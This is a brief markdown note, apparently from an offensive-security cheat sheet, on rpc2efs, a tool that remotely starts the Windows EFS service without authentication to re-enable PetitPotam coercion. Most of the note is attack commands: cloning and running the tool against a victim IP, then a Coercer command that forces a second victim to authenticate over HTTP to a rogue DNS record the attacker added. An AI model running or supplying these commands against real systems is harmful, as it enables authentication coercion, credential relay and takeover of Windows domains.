# rpc2efs.md

By

A cool tool for performing "Unauthenticated start EFS service on remote Windows host (make PetitPotam great again)."

# Install/run

Get impacket installed, then

# Clone repo:
git clone https://github.com/Hypnoze57/rpc2efs.git

# Politely ask EFS to run:
python3 rpc2efs.py ip.address.of.victim

# Once run, the output should say:
# [*] EFS should be running now.

# Attack

coercer coerce --auth-type http -u lowpriv -p 'MyPassLOL!' -l ROGUE-DNS-RECORD-I-ADDED-PREVIOUSLY -t ip.of.victim2.coerce --filter-pipe-name efsrpc

See also

Coercer coerces things to talk to other things!